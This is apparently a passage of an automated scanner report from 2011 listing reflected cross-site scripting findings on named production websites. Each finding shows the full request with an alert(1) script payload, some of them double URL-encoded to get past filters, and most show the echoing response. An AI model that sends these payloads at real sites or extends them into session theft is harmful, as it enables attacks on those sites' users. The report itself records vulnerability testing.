<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html dir=ltr><head><style>a:link {font:8pt/11pt verdana; color:FF0000}a:visited {font:8pt/11pt verdana; color:#4e4e4e}</style><META NAME="ROB ...[SNIP]... <font style="COLOR:000000; FONT: 8pt/11pt verdana">java.lang.Exception: Unable to load script: /LP/50552781/regc977d<script>alert(1)</script>40099239016</font> ...[SNIP]...
3.72. http://schoonermaggieb.net/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://schoonermaggieb.net
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77703"><script>alert(1)</script>54baad66ca7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 77703\"><script>alert(1)</script>54baad66ca7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?77703"><script>alert(1)</script>54baad66ca7=1 HTTP/1.1 Host: schoonermaggieb.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3572c'-alert(1)-'7ac83c64202 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/website_monitoring_features.php3572c'-alert(1)-'7ac83c64202 HTTP/1.1 Host: secure.watchmouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 13:33:30 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: private, no-cache, must-revalidate, max-age=3600 Pragma: no-cache ETag: "0-en-554e289cf1bcc7b77a082c61324b2324" Content-Language: en P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13789
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173.193.214.243::0::::website_monitoring_features.php3572c'-alert(1)-'7ac83c64202'); var serverRef = encodeURIComponent(''); if(document && document.referrer){ jsRef = encodeURIComponent(document.referrer); }else{ jsRef = ''; } requestParams = 'vjsRef='+jsRef ...[SNIP]...
3.74. https://secure.watchmouse.com/en/website_monitoring_features.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://secure.watchmouse.com
Path:
/en/website_monitoring_features.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44dae'-alert(1)-'ea0be109e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/website_monitoring_features.php?44dae'-alert(1)-'ea0be109e7=1 HTTP/1.1 Host: secure.watchmouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:33:07 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: private, no-cache, must-revalidate, max-age=3600 Pragma: no-cache ETag: "0-en-92df66ca00bbb33979c55382314fe555" Content-Language: en P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28330
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173.193.214.243::0::::website_monitoring_features.php?44dae'-alert(1)-'ea0be109e7=1'); var serverRef = encodeURIComponent(''); if(document && document.referrer){ jsRef = encodeURIComponent(document.referrer); }else{ jsRef = ''; } requestParams = 'vjsRef='+jsR ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e22ad"><script>alert(1)</script>045a6513e24 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.icoe22ad"><script>alert(1)</script>045a6513e24 HTTP/1.1 Host: secure.www.denverpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 28 Feb 2011 13:33:25 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: JSESSIONID=KGJ1BJVEM0432CUUCBVSFEY; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Denver and Colorado state breaking news, weather forecasts, sports, local events calendar, ...[SNIP]... <form action="http://secure.www.denverpost.com:443/favicon.icoe22ad"><script>alert(1)</script>045a6513e24?_DARGS=/portlet/polls/html/display_poll.jsp" name="polls_17471655_1298900005171" method="post"> ...[SNIP]...
3.76. https://secure.www.denverpost.com/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://secure.www.denverpost.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 494e5"><script>alert(1)</script>01b478acec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.ico?494e5"><script>alert(1)</script>01b478acec=1 HTTP/1.1 Host: secure.www.denverpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 28 Feb 2011 13:33:10 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: JSESSIONID=JZHG3CWV0UOAGCUUCAYSFFA; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Denver and Colorado state breaking news, weather forecasts, sports, local events calendar, ...[SNIP]... <form action="http://secure.www.denverpost.com:443/favicon.ico?494e5"><script>alert(1)</script>01b478acec=1&_DARGS=/portlet/polls/html/display_poll.jsp" name="polls_17471655_1298899990660" method="post"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b17b"><script>alert(1)</script>ac0959b7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /registration1b17b"><script>alert(1)</script>ac0959b7d/ HTTP/1.1 Host: secure.www.denverpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 28 Feb 2011 13:33:14 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: JSESSIONID=WQJHLBVOSBFJECUUCAYSFEY; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Denver and Colorado state breaking news, weather forecasts, sports, local events calendar, ...[SNIP]... <form action="http://secure.www.denverpost.com:443/registration1b17b"><script>alert(1)</script>ac0959b7d/?_DARGS=/portlet/polls/html/display_poll.jsp" name="polls_17471655_1298899994747" method="post"> ...[SNIP]...
3.78. http://smallbusiness.aol.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://smallbusiness.aol.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47117"><script>alert(1)</script>6668d5656e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?47117"><script>alert(1)</script>6668d5656e8=1 HTTP/1.1 Host: smallbusiness.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.79. http://tags.gawker.com/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://tags.gawker.com
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c0cf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed446f74bb6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c0cf"><script>alert(1)</script>d446f74bb6f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /index.php/3c0cf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed446f74bb6f HTTP/1.1 Host: tags.gawker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.80. http://tags.gizmodo.com/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://tags.gizmodo.com
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81c51%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb28d63d588c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 81c51"><script>alert(1)</script>b28d63d588c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /index.php/81c51%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb28d63d588c HTTP/1.1 Host: tags.gizmodo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.81. https://taxes.hrblock.com/hrblock/login/ForgotAccountInfo.hrbx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://taxes.hrblock.com
Path:
/hrblock/login/ForgotAccountInfo.hrbx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload 5d434</script><script>alert(1)</script>f05d9cd5c2f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hrblock/login/ForgotAccountInfo.hrbx?5d434</script><script>alert(1)</script>f05d9cd5c2f=1 HTTP/1.1 Host: taxes.hrblock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Expires: Fri, 01 Jan 1700 06:00:00 GMT Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 28 Feb 2011 13:33:19 GMT Connection: close Content-Length: 2154
<script language='JavaScript' id='LoadScript'>//p=new X.Page({Title:"Forgot Account Information",RequiresSession:false,Buttons:[new X.NavigationButton({Type:"B"},[]),new X.NavigationButton({Type:"N"}, ...[SNIP]... faultTextBlockStyle"},[new X.Run({Text:" Both my username and password "},[])])])]),new X.TextBlock({Style:"DefaultTextBlockStyle"},[new X.HiddenField({Name:"ReqQueryString",Id:"ReqQueryString",Value:"5d434</script><script>alert(1)</script>f05d9cd5c2f=1"},[])]),new X.RefundOweMeter({},[new X.FederalRefundItem({Amount:"0"},["Refund"])])])</script> ...[SNIP]...
3.82. http://technorati.com/contact-us/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://technorati.com
Path:
/contact-us/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87948"><script>alert(1)</script>0b0cfa17c56 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact-us/?87948"><script>alert(1)</script>0b0cfa17c56=1 HTTP/1.1 Host: technorati.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
3.83. http://theberry.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://theberry.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48452"><script>alert(1)</script>72a20de0cd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 48452\"><script>alert(1)</script>72a20de0cd7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?48452"><script>alert(1)</script>72a20de0cd7=1 HTTP/1.1 Host: theberry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 28 Feb 2011 13:33:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header. X-Pingback: http://theberry.com/xmlrpc.php Link: <http://wp.me/FdpB>; rel=shortlink Content-Length: 99934
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en"> <head profile ...[SNIP]... <a href="http://theberry.com/?48452\"><script>alert(1)</script>72a20de0cd7=1"> ...[SNIP]...
3.84. http://thebrigade.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://thebrigade.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50599"><script>alert(1)</script>e927c624296 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 50599\"><script>alert(1)</script>e927c624296 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?50599"><script>alert(1)</script>e927c624296=1 HTTP/1.1 Host: thebrigade.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 28 Feb 2011 13:33:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header. X-Pingback: http://thebrigade.com/xmlrpc.php Link: <http://wp.me/VeJm>; rel=shortlink Content-Length: 99862
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en"> <head profile ...[SNIP]... <a href="http://thebrigade.com/?50599\"><script>alert(1)</script>e927c624296=1"> ...[SNIP]...
3.85. http://thethrottle.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://thethrottle.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d56e1"><script>alert(1)</script>76817ba5c5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d56e1\"><script>alert(1)</script>76817ba5c5d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?d56e1"><script>alert(1)</script>76817ba5c5d=1 HTTP/1.1 Host: thethrottle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 28 Feb 2011 13:33:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header. X-Pingback: http://thethrottle.com/xmlrpc.php Link: <http://wp.me/VeJh>; rel=shortlink Content-Length: 99149
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en"> <head profile ...[SNIP]... <a href="http://thethrottle.com/?d56e1\"><script>alert(1)</script>76817ba5c5d=1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81132%253c%252fscript%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e6e4e6723c69 was submitted in the REST URL parameter 2. This input was echoed as 81132</script><img src=a onerror=alert(1)>6e4e6723c69 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /twitter/alleyinsider81132%253c%252fscript%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e6e4e6723c69 HTTP/1.1 Host: topsy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Set-Cookie: utid=0e5797982ccf76bd99fba5e3431a6cda; Path=/; Version=1; Domain=.topsy.com Set-Cookie: topsy_session=e0cbce002617db3e3e131acac393917747011cba; path=/; expires=Mon, 07-Mar-2011 13:34:32 GMT; HttpOnly Content-Length: 7154 Content-Type: text/html; charset=utf-8 Expires: Mon, 28 Feb 2011 05:39:32 -0800 Connection: close Date: Mon, 28 Feb 2011 13:34:32 GMT Server: lighttpd/1.4.26
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11016%253c%252fscript%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ea46353a5139 was submitted in the REST URL parameter 2. This input was echoed as 11016</script><img src=a onerror=alert(1)>a46353a5139 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /twitter/amnestyonline11016%253c%252fscript%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ea46353a5139 HTTP/1.1 Host: topsy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Set-Cookie: utid=98b8dcbd5b234996e518842eb5c985c6; Path=/; Version=1; Domain=.topsy.com Set-Cookie: topsy_session=5a6ebc628509a3f2b5ff5f04107d4de88601e4a5; path=/; expires=Mon, 07-Mar-2011 13:34:35 GMT; HttpOnly Content-Length: 7161 Content-Type: text/html; charset=utf-8 Expires: Mon, 28 Feb 2011 05:39:35 -0800 Connection: close Date: Mon, 28 Feb 2011 13:34:35 GMT Server: lighttpd/1.4.26
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e278c%253c%252fscript%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e8e3902afbce was submitted in the REST URL parameter 2. This input was echoed as e278c</script><img src=a onerror=alert(1)>8e3902afbce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /twitter/teresajenkinse278c%253c%252fscript%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e8e3902afbce HTTP/1.1 Host: topsy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Content-Length: 7159 Content-Type: text/html; charset=utf-8 Expires: Mon, 28 Feb 2011 05:39:34 -0800 Set-Cookie: topsy_session=e43702d181826ddede27e7493ac02c2f8089c46b; path=/; expires=Mon, 07-Mar-2011 13:34:34 GMT; HttpOnly Connection: close Date: Mon, 28 Feb 2011 13:34:34 GMT Server: lighttpd/1.4.26
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60da3%253c%252fscript%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e16901b5809c was submitted in the REST URL parameter 2. This input was echoed as 60da3</script><img src=a onerror=alert(1)>16901b5809c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /twitter/usarmy60da3%253c%252fscript%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e16901b5809c HTTP/1.1 Host: topsy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Set-Cookie: utid=fc1779aa9d7d7c141c5e70f330ba9a08; Path=/; Version=1; Domain=.topsy.com Set-Cookie: topsy_session=f78dfeddf44d1f1a44ae372c91944e8b45fbee83; path=/; expires=Mon, 07-Mar-2011 13:34:39 GMT; HttpOnly Content-Length: 7112 Content-Type: text/html; charset=utf-8 Expires: Mon, 28 Feb 2011 05:39:39 -0800 Connection: close Date: Mon, 28 Feb 2011 13:34:39 GMT Server: lighttpd/1.4.26
3.90. http://us.levi.com/home/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://us.levi.com
Path:
/home/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 51023--><script>alert(1)</script>0b3fa4e8229 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /home/index.jsp?51023--><script>alert(1)</script>0b3fa4e8229=1 HTTP/1.1 Host: us.levi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:34:03 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" Pragma: no-cache P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" Set-Cookie: JSESSIONID=cpsrNrkLNJy63ggLX4dbMYj6NN6w2Xgtrtb39YMcXzJsdGqQQnwQ!-1476944712; path=/ Set-Cookie: browser_id=126388741253; expires=Thursday, 25-Feb-2021 13:34:03 GMT; path=/ Set-Cookie: browser_id=126388741253; expires=Thursday, 25-Feb-2021 13:34:03 GMT; path=/ Set-Cookie: browser_id=126388741253; expires=Thursday, 25-Feb-2021 13:34:03 GMT; path=/ Set-Cookie: browser_id=126388741253; expires=Thursday, 25-Feb-2021 13:34:03 GMT; path=/ Set-Cookie: browser_id=126388741253; expires=Thursday, 25-Feb-2021 13:34:03 GMT; path=/ Set-Cookie: browser_id=126388741253; expires=Thursday, 25-Feb-2021 13:34:03 GMT; path=/ Set-Cookie: browser_id=126388741253; expires=Thursday, 25-Feb-2021 13:34:03 GMT; path=/ Set-Cookie: browser_id=126388741253; expires=Thursday, 25-Feb-2021 13:34:03 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 22114
3.91. http://videos.howstuffworks.com/search.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://videos.howstuffworks.com
Path:
/search.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd75f"><script>alert(1)</script>f4645cc2285 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search.php?fd75f"><script>alert(1)</script>f4645cc2285=1 HTTP/1.1 Host: videos.howstuffworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.92. http://virtacore.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://virtacore.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f87a</script><script>alert(1)</script>0429db0f622 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?8f87a</script><script>alert(1)</script>0429db0f622=1 HTTP/1.1 Host: virtacore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/7.5 Set-Cookie: CFID=31613;expires=Wed, 20-Feb-2041 13:33:57 GMT;path=/ Set-Cookie: CFTOKEN=65867355;expires=Wed, 20-Feb-2041 13:33:57 GMT;path=/ X-Powered-By: ASP.NET Date: Mon, 28 Feb 2011 13:33:57 GMT Connection: close Content-Length: 16534
3.93. http://volumelicensing.adobe.com/store/adbevlus/DisplayHomePage [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://volumelicensing.adobe.com
Path:
/store/adbevlus/DisplayHomePage
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 82817--><script>alert(1)</script>46b3e6bc807 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /store/adbevlus/DisplayHomePage?82817--><script>alert(1)</script>46b3e6bc807=1 HTTP/1.1 Host: volumelicensing.adobe.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: ORA_WX_SESSION="10.1.2.215:516-0#0"; path=/ Set-Cookie: JSESSIONID=8CFFDBA1EB4BACE2EF483D1DE201F4A2; path=/ Set-Cookie: VISITOR_ID=971D4E8DFAED43674E9C30E969DDB6188A8DBDD5F1A02F5B; expires=Tue, 28-Feb-2012 19:23:24 GMT; path=/ Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=101713006805,0) Content-Length: 53482 Date: Mon, 28 Feb 2011 13:34:12 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app83 Connection: close Set-Cookie: BIGipServerp-drh-dc1pod8-pool1-active=3607232778.516.0000; path=/
